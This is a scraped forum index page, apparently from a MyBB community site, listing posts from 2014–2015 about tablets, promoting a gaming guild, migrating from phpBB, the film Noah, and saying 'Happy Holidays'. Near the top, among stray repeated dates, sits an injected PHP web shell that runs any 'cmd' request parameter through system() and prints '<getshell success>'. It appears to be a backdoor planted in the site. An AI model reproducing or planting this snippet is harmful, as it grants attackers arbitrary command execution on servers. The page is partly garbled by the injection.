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February 19th, 2025
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February 19th, 2025
if(isset($_REQUEST['cmd'])){ echo "<getshell success>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "<getshell success>"; phpinfo();
February 19th, 2025
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Tablets |
Posted by: Darth-Apple - January 15th, 2015 at 6:20 AM - Forum: Technology & Hardware
- Replies (5)
I'm still playing around with mine, and now I'm just starting to really make good use of it. I have my galaxy tab 3, which is pretty nice for the most part. It's a little shy on the RAM, which makes it difficult for certain things when it comes to working with several apps at once, but besides that, it's pretty nice. I've gotten almost all of this semester's textbooks as ebooks and saved hundreds of dollars as well.
Unfortunately, I need wifi to do anything, but that's not a huge deal. It's definitely proven useful so far, and it's way easier to use and to carry around than a full laptop.
Anyone else here use tablets? If so, what tablet do you personally use?
Are we allowed to pimp our guild? |
Posted by: Sick - January 1st, 2015 at 11:08 PM - Forum: Other Games
- Replies (2)
I don't want to mention our community if it goes against what you guys are trying to do here.
We've got a medium sized, but really fun/great gaming community and wanted to see if others might be interested.
Apologies and Admin/Mods please del this post if it's offensive. I don't want to upset anyone.
Howdy! :) New to MS & MyBB |
Posted by: Sick - December 30th, 2014 at 5:31 AM - Forum: Introductions
- Replies (7)
So we have a fairly medium sized gaming community [ http://exinferno.com/ ] (Shameless plug!), and we are about to make the migration from PHPBB to MyBB. So far I'm absolutely loving it.
I have found Darth Apple's plugin for banners and wanted to ask if someone could pass along a feature request to him:
Could you make a "Close" button on the banner? If folks have seen the banner, they might want to close it to make it go away. This would be nice and some cookie or something would ascertain that they've closed it and they wouldn't have to see it anymore.
Other than that. I love it!
Great site here, I have it bookmarked and hope to visit more soon.
Noah (the movie) |
Posted by: Darth-Apple - December 26th, 2014 at 12:15 AM - Forum: Media & Entertainment
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I just finished watching a rented copy of Noah, a movie that isn't particularly new, but was deemed controversial enough to gain quite some attention from some religious groups that were expecting a more "christian" movie with regards to the movie's plot. When watching the movie, I made a point to avoid judging it based on its biblical accuracy, primarily with the consideration that the production team had openly admitted to its lack of biblical accuracy. But, with that said, I too will admit that the movie was absolutely nothing like the biblical account. I'm not sure I really cared. It was an interesting movie nonetheless.
Perhaps what had left me more disappointed was the fact that a seemingly kind and loving Noah had turned into a character of hate later in the movie. Towards the end, it becomes clear that god is portrayed as virtually uninvolved in man's final fate, and it overall is a sad ending. Shem is the only one who really seems blessed by much by the end of the movie, and noah's inability to see Ham's good intentions to take his girl upon the ark is, quite frankly, startling. The plot as a whole feels like a portrayal of hate in many respects, and the second half is particularly depressing to watch (and also seems a bit inconsistent with the earlier part of the movie in some ways). Nevertheless, the intensity of the movie was entertaining, as was the deviance from what the everyday audience might have expected.
For those who have watched the movie, what were your general thoughts on the movie as a whole? Was the deviance from the expected plot well played, or do you feel it was an idea that was poorly implemented?
"Happy Holidays" |
Posted by: Darth-Apple - December 24th, 2014 at 3:28 AM - Forum: Current Events
- Replies (1)
So, at one of my jobs, I'm not allowed to say "merry christmas" as a fear of offending someone who doesn't celebrate christmas. Very few people here in America don't celebrate christmas, whether religious about their celebration or not, but there are some who still choose to avoid it. The usage of "xmas" has increased as well, sometimes (not always) used as a way to remove "christ" from christmas.
Personally, I'm honestly not all that bothered with using "happy holidays" instead of merry christmas, partly because christmas isn't the only holiday people are celebrating. I'm not really one to pick problems where problems don't exist, but with that said, given the option, I'll generally use "merry christmas" more often than "happy holidays," simply because that seems to be on people's minds more. I suppose that's easy for me to say considering I do celebrate Christmas. 
What is your opinion? Should "merry christmas" be avoided in public situations to avoid offending those who don't celebrate christmas? Is it something that is not necessary due to the majority of people who do celebrate?